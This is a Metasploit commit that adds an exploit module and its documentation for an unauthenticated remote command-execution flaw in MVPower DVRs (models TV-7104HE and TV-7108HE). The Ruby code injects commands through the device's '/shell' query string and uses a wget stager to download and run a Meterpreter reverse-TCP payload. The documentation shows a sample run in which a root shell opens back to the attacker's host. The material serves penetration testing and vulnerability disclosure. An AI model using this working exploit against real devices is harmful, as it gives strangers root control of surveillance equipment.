Land rapid7#7987, MVPower DVR exploit

wvu · wvu · commit 236606838a09 · 2017-02-23T01:46:04.000-06:00
diff --git a/documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md b/documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md
@@ -0,0 +1,43 @@
+## Vulnerable Application
+
+  This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.
+
+  This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).
+
+  The TV-7108HE model is also reportedly affected, but untested.
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/http/mvpower_dvr_shell_exec`
+  3. Do: `set rhost [IP]`
+  4. Do: `set lhost [IP]`
+  5. Do: `run`
+  6. You should get a session
+
+
+## Example Run
+
+
+  ```
+  msf exploit(mvpower_dvr_shell_exec) > run
+
+  [*] Started reverse TCP handler on 10.1.1.197:4444 
+  [*] 10.1.1.191:80 - Connecting to target
+  [+] 10.1.1.191:80 - Target is vulnerable!
+  [*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
+  [*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
+  [*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
+  [*] Command Stager progress - 100.00% done (117/117 bytes)
+  [*] Server stopped.
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 10.1.1.191
+  OS           :  (Linux 3.0.8)
+  Architecture : armv7l
+  Meterpreter  : armle/linux
+  meterpreter > 
+  ```
diff --git a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb
@@ -0,0 +1,97 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'MVPower DVR Shell Unauthenticated Command Execution',
+      'Description' => %q{
+        This module exploits an unauthenticated remote command execution
+        vulnerability in MVPower digital video recorders. The 'shell' file
+        on the web interface executes arbitrary operating system commands in
+        the query string.
+
+        This module was tested successfully on a MVPower model TV-7104HE with
+        firmware version 1.8.4 115215B9 (Build 2014/11/17).
+
+        The TV-7108HE model is also reportedly affected, but untested.
+      },
+      'Author'      =>
+        [
+          'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
+          'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'References'  =>
+        [
+          # Comment from Paul Davies contains probably the first published PoC
+          [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
+          # Writeup with PoC by Andrew Tierney from Pen Test Partners
+          [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
+        ],
+      'DisclosureDate' => 'Aug 23 2015',
+      'Privileged'     => true, # BusyBox
+      'Arch'           => ARCH_ARMLE,
+      'DefaultOptions' =>
+        {
+          'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
+          'CMDSTAGER::FLAVOR' => 'wget'
+        },
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'CmdStagerFlavor' => %w{ echo printf wget },
+      'DefaultTarget'   => 0))
+  end
+
+  def check
+    begin
+      fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
+      res = send_request_cgi(
+        'uri' => "/shell?echo+#{fingerprint}",
+        'headers' => { 'Connection' => 'Keep-Alive' }
+      )
+      if res && res.body.include?(fingerprint)
+        return CheckCode::Vulnerable
+      end
+    rescue ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, opts)
+    begin
+      send_request_cgi(
+        'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
+        'headers' => { 'Connection' => 'Keep-Alive' }
+      )
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Connecting to target")
+
+    unless check == CheckCode::Vulnerable
+      fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
+    end
+
+    print_good("#{peer} - Target is vulnerable!")
+
+    execute_cmdstager(linemax: 1500)
+  end
+end
